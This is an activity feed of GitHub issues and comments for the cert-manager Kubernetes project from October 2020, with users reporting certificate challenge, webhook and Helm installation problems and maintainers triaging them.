[2020-10-06 11:51] lilvinz commented on #2602
Thanks for that. This fixed it for me on microk8s 1.19.

[2020-10-06 13:26] nabsul commented on #3238
Based on some other threads I've been reading, this seems to be related to a bug in Kubernetes DNS, not directly related to cert-manager (but certain affects cert-manager) heavily.

In case this is helpful to others stuck on this issue, I've unblocked myself by manually generating certs and uploading them to my cluster. (Note: I prefer to use a VM or pod to do the following because the source IP a

[2020-10-06 13:29] nabsul commented on #3238
In the meantime, I wonder how hard/bad it would be to hack cert-manager itself to skip the "self check GET request" step altogether. It's a great idea to do this check, but I don't think it's absolutely necessary to the cert renewal process.

[2020-10-06 13:36] nabsul commented on #3238
WARNING: This is a random idea that I haven't fully thought through. Attempt at your own risk :-).

Although I would love to, I most likely don't have time to mess with this idea, but if anyone wants to give it a shot, I would try replacing the testReachability() function [here](https://github.com/jetstack/cert-manager/blob/c62df48680476ce02afb307b8711a5ae3dc38ee8/pkg/issuer/acme/http/http.go#L167

[2020-10-06 14:32] Serrvosky commented on #3341
Hello again @meyskens. I was searching about this issue and I found this link: https://www.digitalocean.com/community/questions/how-to-support-internal-traffic-with-proxy-protocol-enabled-on-a-kubernetes-loadbalancer .

I think that this is the problem, however, I haven't passed it yet.

[2020-10-06 14:49] ragurakesh opened #3346 "Failed to create Order: malformed: No Key ID in JWS header"
**Describe the bug**:
Certificate-request fails to create order reporting  `malformed: No Key ID in JWS header`
cert-manager version 1.0.2
ClusterIssuer resource is created successfully for DigiCert as ACME cert issuer.

[code]

[code]

**Expected behaviour**:
Certificate request creates Order for certificate from Issuer.

**Steps to reproduce the bug**:
- Install cert-manger 1.0.2
- Configure Clu

[2020-10-06 15:02] meyskens commented on #3346
Possible duplicate of https://github.com/jetstack/cert-manager/issues/2561 ?

[2020-10-06 15:05] ragurakesh commented on #3346
@meyskens Likely, but the the delete and recreate of ClusterIssuer resource doesn't help

[2020-10-06 15:19] meyskens commented on #3092
/assign

[2020-10-06 16:14] Serrvosky commented on #3341
Hi, @meyskens. Finally, I found the problem. Once my nginx is served using a load balancer and with proxy protocol enabled when the cert-manager is trying to check for the HTTP challenge, it cannot reach the specified endpoint. For now, to resolve this problem I disable Nginx proxy protocol.

I found this problem, when I perform a curl from a pod inside the cluster using the flag --haproxy-protoco

[2020-10-06 20:23] PaulusTM commented on #3342
I'd love to start working on this

[2020-10-06 20:58] benjick commented on #2494
Having the same issue on chart version `v1.0.2`. I tried the fix @demisx but it didn't help. Any suggestions?

[2020-10-06 21:04] jallaix commented on #3331
Almost the same error for me except I use Nginx ingress controller 1.10.2.
When describing the Challenge, I get:

Waiting for HTTP-01 challenge propagation: did not get expected response when querying endpoint, expected "XXXX" but got: <!doctype html>
<html l... (truncated)

[2020-10-07 02:13] bemanuel commented on #3335
Same steps, same issue, except I'm using http01.
Under Cert Requests:

[code]

Logs from cert-manager:
[code]
And  from acme solver:
[code]

[2020-10-07 05:02] tyg03485 opened #3348 "Fail to deploy helm chart with default value"
**Describe the bug**:
When you deploy `cert-manager` helm chart with default value, you could get error message like below;

[code]
same as `cert-manager-webhook`.

**Expected behaviour**:
The tag default value is defined at
https://github.com/jetstack/cert-manager/blob/master/deploy/charts/cert-manager/templates/cainjector-deployment.yaml#L54
https://github.com/jetstack/cert-manager/blob/master/d

[2020-10-07 06:53] meyskens commented on #3348
The chart in our repo is a template for the chart we publish, our release tooling will replace the version.
Please use our chart repo `https://charts.jetstack.io` see https://cert-manager.io/docs/installation/kubernetes/#installing-with-helm

/close

[2020-10-07 06:53] #3348 closed

[2020-10-07 07:00] meyskens commented on #3342
@PaulusTM that would be great you can do `/assign` so your name is on this one ;)

[2020-10-07 07:04] PaulusTM commented on #3342
/assign

[2020-10-07 08:04] meyskens opened #3350 "Venafi e2e tests: enable more features"
We currently run e2e tests to the Venafi TPP instance with a lot of features disabled due to the TPP being in a default configuration.
We should investigate if we can enable more features like ECDSA, IP and Email SANs so we have a wider test coverage.

(as per review comment in https://github.com/jetstack/cert-manager/pull/2966)

/kind cleanup
/area issuer/venafi
/priority important-longterm

[2020-10-07 08:35] meyskens commented on #3092
So Let's Encrypt still throws `Failed to create Order: 400 urn:ietf:params:acme:error:malformed: NotBefore and NotAfter are not supported` :disappointed:

[2020-10-07 08:54] meyskens commented on #3092
okay so it is per the spec that it does this, will be adding a `enableNotAfterDate` option to the issuer

[2020-10-07 14:10] #3274 closed

[2020-10-07 15:12] bemanuel commented on #3335
I'm using k3s with traefik, so it work changing the Cluster Issuer to use traefik:
solvers:
    - http01:
        ingress:
           class: traefik

And I'm using LB Layer 4 on pfSense, for some reason just works when I add: **serviceType: ClusterIP**
    - http01:
        ingress:
           serviceType: ClusterIP
           class: traefik

[2020-10-07 15:20] Roydon commented on #3335
Can you show your manifest for `ClusterIssuer` & `Certificate` (masking credentials)

[2020-10-07 15:34] ppatierno commented on #3307
@meyskens so I gave up with using HTTP01 challenge because as already explained it's problematic with OpenShift routes using TLS "passthrough" as in our case so I switched to use DNS01 challenge.

Now, my `ClusterIssuer` resource has kind of following ...

[code]

and the `Certificate` just one route as follow:

[code]

I am getting the following error from cert-manager

[code]

I see a "propagati

[2020-10-07 15:37] bemanuel commented on #3335
Sure, I didn't create the Certificate, but this is what I did:
Created the ClusterIssuers:
-- Staging
[code]
-- Prod
[code]

Ingress, put annotations and tls:
[code]

[2020-10-07 17:28] perezjasonr commented on #3062
I too had to install the CRDs manually, while it worked, I was hoping the installCRDs flag would handle that step. I actually looked through the repository and I can't see how that flag is used. I don't see any CRD resources in the templates folder. Is this a WIP?

[2020-10-07 17:50] jnu commented on #3062
this worked with a single helm command? by latest do you mean 1.0.2?

[2020-10-07 18:03] perezjasonr commented on #3062
@jnu
yes correct, order of events was:

`kubectl delete -f https://github.com/jetstack/cert-manager/releases/download/v1.0.2/cert-manager.crds.yaml`

make sure crds are gone (and they were missing)

`helm install cert-manager jetstack/cert-manager --namespace cert-manager --set installCRDs=true --create-namespace --version v1.0.2`

and then check crds:

[code]

[2020-10-07 18:52] jnu commented on #3062
@perezjasonr ahh ok, yes this works for me as well

The CRDs are in the repo here: https://github.com/jetstack/cert-manager/blob/master/deploy/crds/. They use bazel to build the helm chart, which puts these CRD templates get put into the chart's `templates/` directory with the other templates.

I'm still having a slightly different problem, though, which is in trying to use cert-manager as a helm

[2020-10-07 19:06] ltetrel commented on #3021
I am running `v1.0.2` and was able to get a valid certificate with a `HTTP01` challenge.
Did not try the `DNS01` challenge but it could be worth that someone check it with the newest cert-manager version.

[2020-10-07 23:06] supriya-premkumar opened #3353 "auth zone hostedZoneID lookup doesn't perform best match potentially leading to DOS'ing AWS' IAM API"
**Describe the bug**:

When there are multiple hosted zones (top-level zone and delegated zones) in route53, cert-manager uses the first match instead of the best match to find out the hosted zone ID for authZone. Here cert-manager has access only to the delegated zone and not to the top-level zone. This leads cert-manager to create dns01 record for the top-level domain to which it doesn't have IA

[2020-10-07 23:16] brunobolandini opened #3355 "Certificate issued but application doesnt update from fake cert on azzure cluster"
Im using kubernetes v1.17.11 , cert-manager v1.0.2 and letsencrypt in an azzure cluster.
Ive tested the deploy using https://cert-manager.io/docs/installation/kubernetes/#verifying-the-installation
Although I can see the certificates being issued successfully the certificates, the applications still display kubernetes fake certificates.
The expected behaviour is for the applications (grafana and k

[2020-10-08 08:53] meyskens commented on #3355
/triage support

can you get us a bit more info? Like the configuration used to get the certificates? Have you went through the troubleshooting guide?

[2020-10-08 09:45] meyskens commented on #3338
Have you taken a look at https://cert-manager.io/docs/concepts/webhook/#known-problems-and-solutions?

[2020-10-08 11:54] meyskens commented on #3331
Do you also see this when you access the token URL on your computer?
Can you check if the created ingress resource is correct?

[2020-10-08 11:54] meyskens commented on #3331
/triage support

[2020-10-08 11:59] ankitsoni17-png commented on #3338
Hi @meyskens
First thing is that I am not using any custom CNI. And second one is that the URL which you provided is for cert-manager version 1.X but I am using cert-manager 0.16.1.
I checked for compatibility issues in v0.16.0 docs but didn't find any issue regarding EKS cluster.
Also all the ports are allowed within the cluster. I tried with changing the "webhook.secureport" to some other port b

[2020-10-08 12:02] meyskens commented on #3341
This is going to be fixed upstream in https://github.com/kubernetes/enhancements/pull/1392

[2020-10-08 12:03] meyskens commented on #3341
/close

closing this issue for now as the issue is solved. A discussion on this topic was in https://github.com/jetstack/cert-manager/issues/466

[2020-10-08 12:03] #3341 closed

[2020-10-08 12:16] meyskens commented on #3338
The documentation for that is only present in v1.0.0 as the workaround wasn't in 0.16.
Have you looked into the cabundle part as you are getting a certiicate validation error

[2020-10-08 12:17] meyskens commented on #3346
Not sure if it could be related to Digicert, I do not have access to their ACME endpoint so cannot try to replicate it on my setup. Not sure if there are any other cert-manager users using digicert.

[2020-10-08 12:20] meyskens commented on #3238
I strongly reccomend not doing that, have you tried https://cert-manager.io/docs/usage/certificate/#temporary-certificates-whilst-issuing ?

[2020-10-08 12:28] meyskens commented on #3246
@jnu cert-manager as a chart dependancy will always give issues due to the Helm dependancy model.
the crds folder in Helm doesn't allow us to update the CRDs there is an open discussion to improve this on the Helm side.

[2020-10-08 12:30] meyskens commented on #3311
Let's encrypt supports wildcard certificates but only with DNS01 validation.
Good to hear is is solved now, will close this issue.

/close

[2020-10-08 12:30] #3311 closed

[2020-10-08 12:32] meyskens commented on #3315
I see, Helm strongly suggests to upgrade to v3 and so do we, this syntax is correct in v3.

/close

[2020-10-08 12:32] #3315 closed

[2020-10-08 12:34] meyskens commented on #3133
We have new Webhook debug documentation, I suggest checking them out at https://cert-manager.io/docs/concepts/webhook/
if we missd any use case PRs welcome!

[2020-10-08 13:29] brunobolandini commented on #3355
@meyskens I was using the wrong service, sorry about opening this.

[2020-10-08 13:29] #3355 closed

[2020-10-08 14:08] meyskens commented on #3263
/assign

[2020-10-08 14:36] ameet-nandihal commented on #3281
@furkatgofurov7  could you please help me in resolving the same issue whiam facing. iam facing the issue on AKS cluster.
let me know what i need to configure to mske this work.

Environment details::

AKS Kubernetes version (e.g. v1.18.8):
cert-manager version (e.g. v0.15.0):
Install method (helm):

[2020-10-08 15:46] Ndidi opened #3359 "Duplicate Issue. Please close."
Duplicate Issue. Please close.

[2020-10-08 15:48] Ndidi opened #3360 "Wrong status code '404' & Challenge returns Not Found"
`kubectl describe challenge` returns a pending state with the reason: Waiting for HTTP-01 challenge propagation: wrong status code '404', expected '200'

When I `curl` the fill URL, the response is `Not Found`:

[code]

**Expected behaviour**:
The challenge to complete successfully

**Steps to reproduce the bug**:
I'm following the official tutorial, with the exception that I'm using ingress-nginx

[2020-10-08 21:34] #3359 closed

[2020-10-08 22:05] johngmyers commented on #1921
/reopen

[2020-10-09 03:37] ankitsoni17-png commented on #3338
I checked the ca-bundle from my side. Everything seems fine. Could you please suggest what all things need to be checked. I don't want to miss anything.
Also while deploying cert-manager I got some warnings:
[code]

[2020-10-09 08:33] ankitsoni17-png commented on #3338
Hi @meyskens
This issue got resolved for me. So closing it.

[2020-10-09 08:56] ankitsoni17-png commented on #2920
I am getting this same error on EKS server. I am using helm3 to install cert-manager and Rancher.
Cert-Manager: v0.16.1
Kubernetes: v1.15.11-eks-af3caf
kubectl: v1.18.6

[2020-10-09 12:22] jeroenjacobs79 opened #3362 "Vault (Cluster)Issuer with k8s auth cannot be created via Helm or ArgoCD"
**Describe the bug**:
A clear and concise description of what the bug is.

I've been following the documentation to setup a Vault Issuer with Kubernetes authentication (https://cert-manager.io/docs/configuration/vault/). Since I use ArgoCD (which uses Helm under the hood), I wanted a fully automated "git-ops" workflow to provisioning Issuers and ClusterIssuers.

However, I don't see how this is po

[2020-10-09 12:24] jeroenjacobs79 opened #3363 "Vault Issuer with Kubernetes authentication cannot be automated via Helm"
**Describe the bug**:

I've been following the documentation to setup a Vault Issuer with Kubernetes authentication (https://cert-manager.io/docs/configuration/vault/). Since I use ArgoCD (which uses Helm under the hood), I wanted a fully automated "git-ops" workflow to provisioning Issuers and ClusterIssuers.

However, I don't see how this is possible because of the way cert-manager works. The cu

[2020-10-09 13:29] meyskens commented on #3289
/assign

[2020-10-09 14:59] meyskens commented on #3140
/assign @wallrj

[2020-10-09 14:59] ppatierno commented on #3307
@meyskens let me add that using `dig` I am able to get an answer and reach the TXT record.
The previous cluster was deleted but with a new one I get same error from cert-manager while `dig` just works.

[code]

[2020-10-09 15:21] Smana commented on #2166
looking forward to it @crandles . Thanks

[2020-10-09 15:44] wI2L opened #3365 "Namespaced controllers deployment with Helm"
**Is your feature request related to a problem? Please describe.**
When deploying `cert-manager` using Helm, it creates `ClusterRoleBinding` RBAC resources to gives the permissions to the controllers to manipulates resources in all namespaces:
https://github.com/jetstack/cert-manager/blob/master/deploy/charts/cert-manager/templates/rbac.yaml#L302
https://github.com/jetstack/cert-manager/blob/maste

[2020-10-09 16:26] jallaix commented on #3331
Calling _http://mysite/.well-known/acme-challenge/CHALLENGE_KEY_ (as is described in the cert-manager generated ingress) from my computer brings me to my main web application, as it's configured in my own ingress.
I'll try to use `acme.cert-manager.io/http01-edit-in-place: "true"` to see if it works better.

[2020-10-09 18:25] furkatgofurov7 commented on #3281
@ameet-nandihal in my case the issue was not at all in cert-manager or webhook, it was calico pod having misconfigured configurations, plus my deployment is in baremetal. I would suggest you to reach out to cert-manager slack channel or open a different issue in this repo.

[2020-10-09 20:17] jeroenjacobs79 commented on #3362
Apologies, I did not intend to create a duplicate. Got a 404 during POST, and created another one. Seems two got created now.

[2020-10-09 20:17] #3362 closed

[2020-10-09 21:41] 7ing opened #3366 "Export certificate controller sync call duration metrics"
**Is your feature request related to a problem? Please describe.**
Not a problem. But improve the metrics reading for performance testing.

**Describe the solution you'd like**
Just like `acmeClientRequestDurationSeconds`, to record certificate controller sync duration, and export as a metric.
https://github.com/jetstack/cert-manager/blob/c98415062ae3273af440ecee4b5fd5e1df4c0e79/pkg/metrics/metric

[2020-10-09 21:50] munnerz commented on #3366
I think this issue could be expanded to include metrics for _all_ controllers, not just the certificate controller

[2020-10-10 00:39] metral commented on #3079
Hi folks,

On AWS EKS: v1.17.9
Using Helm Chart v1.0.3 with DNS01 Challenge.

I'm hitting the error: ` "error"="error instantiating route53 challenge solver: unable to construct route53 provider: empty credentials; perhaps you meant to enable ambient credentials?"` with an `Issuer` set up like @alkiko suggests in https://github.com/jetstack/cert-manager/issues/3079#issuecomment-657795131

The IAM

[2020-10-10 04:04] evgkrsk commented on #3342
Hm... seems like having alerting rule for ingress metrics is better solution for expiried certs monitoring (including all certs for ingress resources, not only cert-manager-provided). Fresh ingress-nginx chart, for example, have such rule in default values.yaml, commented out by default:

[code]

So, it is better to have way to disable PrometheusRule(s), bundled with cert-manager, to avoid duplica

[2020-10-10 05:59] ZhiminXiang opened #3367 "Re-applying cert-manager YAML stucks"
**Describe the bug**:
In my cluster, I firstly installed cert-manager with https://cert-manager.io/docs/installation/kubernetes/#installing-with-regular-manifests

And then later, I rerun the "kubectl apply" command with the same yaml. And then "kubectl apply" command got stuck.

**Expected behaviour**:
The second run of "kubectl apply" should still work.

**Anything else we need to know?**:
I am

[2020-10-10 11:09] ppatierno commented on #3307
@meyskens just for let you know that I got it working.
The cert-manager was using a local resolver, I fixed it adding the --dns01-recursive-nameservers to the deployment for using a global authoritative one.

[2020-10-10 11:09] #3307 closed

[2020-10-10 17:50] meyskens commented on #3367
This is a duplicate of #3121 please update your kubectl

/close

[2020-10-10 17:50] #3367 closed

[2020-10-10 20:45] PaulusTM commented on #3342
This is exactly how we are using the checks in our current production setup @evgkrsk.

For now I have added a PrometheusRule with an basic alert that detects if the cert manager job will be absent from Prometheus.

[2020-10-12 04:54] ankitsoni17-png opened #3370 "Webhook Issue: EKS: Internal error occurred: failed calling webhook "webhook.cert-manager.io": Post https://rancher-cert-cert-manager-webhook.cert-manager.svc:443/mutate?timeout=30s: x509: certificate signed by unknown authority"
**Describe the bug**:
I am trying to deploy Rancher on EKS and using cert-manager to generate the self-signed certificate.
Cert-manager is deployed successfully using helm (both CRD and server) but while deploying Rancher or running the test-resources.yaml (provided in cert-manager doc to test) I am getting webhook issue:

```Error from server (InternalError): error when creating "test-resources.y

[2020-10-12 15:13] ptzianos opened #3371 "Make deployment matchLabels configurable"
**Is your feature request related to a problem? Please describe.**
Allow the matchLabels in the Helm templates to be easily configurable via the CLI or the values file

**Describe the solution you'd like**
Be able to set the matchLabels of all deployments easily through the Helm template CLI or the values file

**Describe alternatives you've considered**
-

**Additional context**
Using older cert-

[2020-10-12 18:39] metral commented on #3079
Update: tried v0.15.2 with a `ClusterIssuer` and it is working with IRSA, whereas before I was using an `Issuer` with v1.0.3 and it was not. `fsGroup: 1001`, and `runAsUser: 1001` is also set in the `securityContext` of the Helm chart.

It seems that something may have broken in between releases or something w.r.t IRSA was not accurately captured in the docs.

[2020-10-12 20:07] alexsorkin commented on #3338
I getting pissed off by people who say the issue resolved, without explanation, what was done to solve it.

[2020-10-13 01:10] pstackle commented on #2722
I would also like to see cert-manager have the ability to inject a `ca.crt` file into a `ConfigMap`.

The use case would be to make a root certificate available to a client pod/container.

Scenario:
- service A needs to be accessed by client B within the K8s cluster over a TLS connection (service A is not exposed outside of the cluster).
- in namespace A (which contains service A): a `SelfSigned`

[2020-10-13 03:45] ankitsoni17-png commented on #3338
Hi @alexsorkin
Apologies for not mentioning the reason. Let me explain you the scenerio.
As the cert-manager was not working for me initially so I tried to deploy it on some different namespace(rancher-certs). But there also it didn't worked. So I removed it from that namespace. But unfortunately "ValidatingWebhookConfiguration" and "MutatingWebhookConfiguration" didn't removed at that time.
Then

[2020-10-13 06:47] fristedt commented on #2789
We would also love to see this added. Is there a reason why the trust store was added for only JKS?

[2020-10-13 06:56] fristedt opened #3373 "Add truststore.p12 to CA secret when keystore.p12 is requested for a certificate"
**Is your feature request related to a problem? Please describe.**
Java applications use JKS files up to Java8, but since Java9 it is recommended to use P12 instead for both key stores and trust stores.

A previous effort (https://github.com/jetstack/cert-manager/issues/2789) was made to implement support for trust stores in JKS, but support for P12 seems to be missing.

**Describe the solution yo

[2020-10-13 08:25] alexsorkin commented on #3338
Hi, the problem eventually heels itself... You should simply wait ~20 seconds before creating issuer, after cert-manager deploy, to let cainjector to inject the CA certificates into webhook.
Its not an issue... but the behaviour should be documented in cert-manager "Getting Started document".

[2020-10-13 08:38] ankitsoni17-png commented on #3338
Hi @alexsorkin
I tried this also. Waited for 10 min after cert-manager deployment but still the same issue.

[2020-10-13 08:44] surajssd opened #3374 "cert-manager installation fails on PSP enabled k8s 1.19.x clusters"
**Describe the bug**:

On a PodSecurityPolicy enabled k8s 1.19.x when you install the helm chart of cert-manager no pods start.

[code]

**Expected behaviour**:

I expected that the shipped PSP configs in helm chart, make sure that the pods run without issues.

**Steps to reproduce the bug**:

Start a minikube cluster:

[code]

Once the machine is up and trying to come up run following command:

[

[2020-10-13 09:25] munnerz commented on #2722
It seems like the overarching reason to actually do this is as a means for *trust distribution* within a cluster.

From that perspective, I think we can narrow the scope of this in order to reduce the security concerns mentioned above, whilst also building something that's more extensible/useful in future too.

The current issue I see with the above proposals is that it requires that we refer to a

[2020-10-13 09:28] #3353 closed

[2020-10-13 10:20] munnerz commented on #2722
My concerns around (1) are that it pushes the onus for this on _all_ clients, which makes it harder for people to build issuer-agnostic integrations in future to build their own layers on top of our trust distribution mechanism. This could be alleviated if we provide some form of generic client to handle this, but we may then be creating more maintenance problems for ourselves.

The drawback of (2

[2020-10-13 11:33] meyskens commented on #3374
Seems to be related to https://github.com/jetstack/cert-manager/blob/d33481da6a1faf744ac5ee5a4956dd9cc39c25c5/deploy/charts/cert-manager/templates/webhook-psp.yaml#L16

[2020-10-13 12:17] meyskens commented on #3250
@sharmaansh21 how is it going? If we can help with anything let me know

[2020-10-13 12:19] meyskens commented on #3149
/assign

[2020-10-13 12:22] BuckinghamIO commented on #3062
I've also tried to use cert-manager as a sub chart and the same issue occurs on v1.0.2 and below also.

The chart does not seem to respect a top level value of --set cert-manager.installCRDs=true or --set installCRDs=true so I'm having to run a 2 step install which is annoying and feels clunky.

[2020-10-13 12:42] meyskens commented on #3149
This is still not merged in so we'll have to delay adding validation for it in the CRD spec

[2020-10-13 17:56] cuotos commented on #2576
We moved from Kubed to https://github.com/emberstack/kubernetes-reflector for this very reason.

[2020-10-13 21:56] onmyflow commented on #2576
Thanks for the suggestion! I'll try to switch to reflector since all we use kubed for, is to sync secrets anyway.

[2020-10-13 22:04] kfox1111 commented on #2576
Yeah, this looks very promising. Thanks.

[2020-10-14 00:56] drewwells opened #3377 "CertManager does not install with default settings"
**Describe the bug**:
CRDs are being rendered as templates with chart specific labels and annotations. For helm2, CRDs require a special crd-install hook label. For helm3, the CRDs are expected to be static in the crds folder. The current packaging model has unsuccessfully implemented either helm2 and helm3 install paths for CRDs.

It appears that rendering of CRDs was chosen in lieu of the helm g

[2020-10-14 05:25] bbearce commented on #2379
@Raghubalam, I'm seeing the same thing.
![image](https://user-images.githubusercontent.com/7649007/95947014-bd3eff80-0dbb-11eb-9111-9106c335c711.png)

This [link](https://cert-manager.io/docs/faq/troubleshooting/) has
`Spec:
  Issuer Ref:
    Group:  cert-manager.io
    Kind:   ClusterIssuer
    Name:   **letsencrypt-production**
`
whereas we have
`
Spec:
  Issuer Ref:
    Group:  cert-manager.io

[2020-10-14 05:43] misteruly opened #3378 "Generate certificate challenge error"
In kubesphere-V3.0.0 deployment

error message:
Waiting for http-01 challenge propagation: failed to perform self check GET request 'http://echo10.misteruly.th/.well-known/acme-challenge/_KdG6N0Ds-uiz706Xy3ia_6blDZDDIKRzxXGsYaGNZU': Get "http://echo10.misteruly.th/.well-known/acme-challenge/_KdG6N0Ds-uiz706Xy3ia_6blDZDDIKRzxXGsYaGNZU": dial tcp: lookup echo10.misteruly.th on 169.254.25.10:53: no s

[2020-10-14 08:30] meyskens commented on #3378
/triage support

seems your cluster's DNS is broken

[2020-10-14 08:38] meyskens commented on #3062
This is the reason: https://github.com/helm/helm/issues/7735

Our chart does not support being installed as a sub-chart, as it manages cluster wide resources this would be a bad idea.

[2020-10-14 08:39] meyskens commented on #3373
/kind feature
/priority important-longterm

[2020-10-14 08:41] meyskens commented on #3338
Is the cainjector running? See https://github.com/jetstack/cert-manager/issues/3338#issuecomment-705458087

[2020-10-14 08:47] ankitsoni17-png commented on #3338
Hi @meyskens
The cainjector is also running.
Everything is healthy and is in running state.

[code]

[2020-10-14 10:29] ankitsoni17-png commented on #3338
Hi @meyskens
I debugged a bit more and monitored the logs of cainjector pod logs and found the below issue.
[code]

[2020-10-14 11:06] alexsorkin commented on #3338
It seems to be Rancher specific, missing proper PSP role.

[2020-10-14 11:38] benlangfeld commented on #2576
I continue to use Kubed because kubernetes-reflector is not a full replacement; it does not allow syncing between clusters, nor is it possible to create a dummy mirror Secret without valid `data`.

This feature requirement remains open on cert-manager for me. I'm willing to implement it or potentially fund its implementation, but need @munnerz to acknowledge the suggestion from @kfox1111 before in

[2020-10-14 12:31] wonderflow opened #3381 "Setup separate package for cert-manager API"
**Is your feature request related to a problem? Please describe.**

Now the whole package of cert-manager has contained to many dependencies, that make collision easy to happen for other projects who just want to import the API only.

**Describe the solution you'd like**

I hope we can setup a separate package for APIs only, so other project can easy to use.

/kind feature

[2020-10-14 20:33] jjtroberts commented on #646
@pwplusnick, for my edification, was the reason you moved on because of Namecheap's requirement of an authorized (static) IP address for API access? If not, why were you unable to move forward?

[2020-10-15 00:54] johngmyers opened #3383 "Certificate API doc omits "3072" as valid RSA key size"
**Describe the bug**:
The API documentation on `CertificatePrivateKey.Size` incorrectly omits the valid value of "3072" for RSA private keys.

**Expected behaviour**:
The API documentation should not imply through omission that valid values are prohibited.

**Steps to reproduce the bug**:
* Create a `Certificate` resource as follows:

[code]

* Notice a certificate with a 3072-bit key is placed in

[2020-10-15 03:39] wonderflow commented on #3381
I have setup a repo for this issue, hope there could have some official repo for this need, thanks!

https://github.com/wonderflow/cert-manager-api

[2020-10-15 04:28] ankitsoni17-png commented on #3338
Hi @meyskens
The issue is resolved now. The problem was with Clusterrole "cert-manager:rancher-cert-cert-manager-cainjector" created for serviceaccount by cert-manager. The serviceaccout mapped with this role also expects access on configmaps. But in cert-manager helm chart configmaps access part is missing in ClusterRole definition.
I have edited the file manually and the issue went off.
This thi

[2020-10-15 04:28] #3338 closed

[2020-10-15 07:20] meyskens commented on #3383
Our validation marks every key between 248 and 8192 as valid: https://github.com/jetstack/cert-manager/blob/master/pkg/internal/apis/certmanager/validation/certificate.go#L63

[2020-10-15 08:20] surajssd commented on #3374
@meyskens this is not related to apparmor, because as mentioned in the `helm install` instructions I am disabling it by using flag `--set global.podSecurityPolicy.useAppArmor=false`.

[2020-10-15 08:21] surajssd commented on #3374
Also if apparmour is applied to a pod on a non debian machine the pod stays in `Blocked` state. Here the pod is not passing the admission controller stage.

[2020-10-15 16:49] germetist opened #3386 "no matches for kind "Issuer" in version "certificates.k8s.io/v1""
**Describe the bug**:
Error no matches for kind "Issuer" in version "certificates.k8s.io/v1"

**Expected behaviour**:
resources should be created

**Steps to reproduce the bug**:

clean install kubernetes with kubespray

stab by step from https://cert-manager.io/docs/installation/kubernetes/

kubectl create namespace cert-manager
helm repo add jetstack https://charts.jetstack.io
helm repo update
h

[2020-10-15 16:56] meyskens commented on #3386
The version has to be cert-manager.io/v1

[2020-10-15 16:56] johngmyers commented on #3383
Looks like that's 2048, not 248. (I believe you'd have trouble making signatures with a 248-bit RSA key.)

[2020-10-15 17:11] #3386 closed

[2020-10-15 23:44] yassinetimdouine commented on #2494
I'm facing also the same problem on chart version ```V1.0.2 .
using DNS01 Challenge Provider
kubernetes 1.13

Any suggestions?

[2020-10-16 06:40] tdewitt opened #3387 "Nonstop errors after upgrade"
**Describe the bug**:
I upgraded on of my clusters from 0.16 to 1.0.2 and am getting this error over and over:
[code]
I followed the 0.16 for k8s 1.15 instructions, did a complete purge of everything and did a clean install using helm (v3) with `installCRDS: true` set.  I've done this for two other clusters without issue but this one hasn't gone well.

**Expected behaviour**:
I expected a clean up

[2020-10-16 08:12] meyskens commented on #3387
You say you use version: `1.5.11` or did you mean `1.15.11`?

Did you convert the resources to v1 before applying them again?
Can you do `kubectl get crd` and `kubectl describe crd orders.acme.cert-manager.io`?

[2020-10-16 08:48] #3285 closed

[2020-10-16 11:51] linuxmail opened #3388 "https://...svc/mutate?timeout=10s: Service Unavailable"
**Describe the bug**:
Trying to execute `kubectl apply -f test-resources.yaml` and it fails with:
[code]

**Expected behaviour**:
Test certificate for example.com should be created

**Steps to reproduce the bug**:
[code]
All seems fine ... but apply the test fails with the error above.

**Anything else we need to know?**:

**Environment details:**:
- Kubernetes version (v1.18.9+k3s1):
- Provisione

[2020-10-16 13:39] johanbrandhorst commented on #3338
I'm also seeing this using `v1.0.3`. I'm not familiar with the codebase, but do we need to patch `clusterrole.rbac.authorization.k8s.io/v1/cert-manager-cainjector` to include access to `configmaps`?

[2020-10-16 14:28] tdewitt commented on #3387
Typo.  Yes, 1.15.11.

Here you go:
[code]

[code]

[2020-10-16 15:01] #3301 closed

[2020-10-16 15:29] tdewitt commented on #3387
There appear to be two challenges that did not delete:

[code]

[2020-10-16 15:34] #3263 closed

[2020-10-16 16:51] meyskens opened #3390 "ingress-shim + HTTP01 using latest APIs"
We currently still use extensionsv1beta1 for our ingress shim, since we support Kubernetes 1.11 we cannot change this just yet.
Some parts we already query the API server for API support, would be good to look into switching to networking.k8s.io/v1 if it is present for the ingress-shim and HTTP01 requests to use the new API.

/kind feature
/area ingress-shim
/priority important-soon

[2020-10-16 17:27] tdewitt commented on #3387
I managed to remove those invalid resources by removing cert-manager, rolling back to an old version, forcing deletes of the challenges and then upgrading.  After some careful grooming of everything, I seem to be back in business.  Sorry for the false alarm.

[2020-10-16 17:27] #3387 closed

[2020-10-16 22:47] vniche opened #3391 "Update certificates secret provisioning to a more agnostic approach"
**Is your feature request related to a problem? Please describe.**
At the time being cert-manager broadly (many, maybe all issuers) provides certificates in a way that eases configuration on webservers and others solutions that relies on a single bundled certificates PEM format file, which is served as `tls.crt`.

Current provisioned secret structure:
- ca.crt: only the issuer CA (latest on the CA

[2020-10-16 23:19] vniche opened #3392 "Tests should verify if a certificate is valid"
**Is your feature request related to a problem? Please describe.**
At the time being Issuers tests are relying on what developers expect on how the [contents should look like](https://github.com/jetstack/cert-manager/blob/a70298180a198317968d2bea1b69279ab52a2634/pkg/internal/vault/vault_test.go#L175).

**Describe the solution you'd like**
It should be considered the addition of a further step veri

[2020-10-17 10:48] mohamedalaa33 commented on #3238
@meyskens  what do you recommend ??

[2020-10-17 14:59] InsOpDe opened #3393 "On creating challenge: "invalid memory address or nil pointer dereference""
**Describe the bug**:
`cert-manager`-pod crashes when issuing a new certificate with `dns01`-solver.

**Expected behaviour**:
Pod does not crash and certificate is created.

**Steps to reproduce the bug**:
Create an ingress-resource which points to an internal Load Balancer

**Anything else we need to know?**:
I have a private GKE-cluster with an internal nginx-ingress.
It does work with an extern

[2020-10-17 15:01] InsOpDe commented on #3393
I am not sure if this is the right way to get tls certificates for ingresses which are in a private cluster, but it seemed logical to me, as lets-encrypt doesnt have to access the cluster-nodes itself in order to verify everything.
If this could be the problem to begin with, Id be happy to get wiser :)

[2020-10-17 18:20] lenkeybalis opened #3394 "ACME server URL host and ACME private key registration host differ. Re-checking ACME account registration"
**Problem details:**
There was a working cert-manager on my old Kubernetes cluster. Now I just rebuilt this complete Kubernetes cluster.
I use the 1.0.0 cert-manager version. The all required three pods started as required.

Cloud you please help in this issue? I tried to do a lot of possible solution/things but one of them was good for me.
I hope that I attached all things what required.

**Techn

[2020-10-17 21:08] SirNarsh commented on #2602
Using hetzner cloud servers here, and the problem was fixed indeed by changing MTU not cert-manager

Changing calico MTU from 1440 to 1400 or 1420 fixed the error running test-resource.yaml

[code]

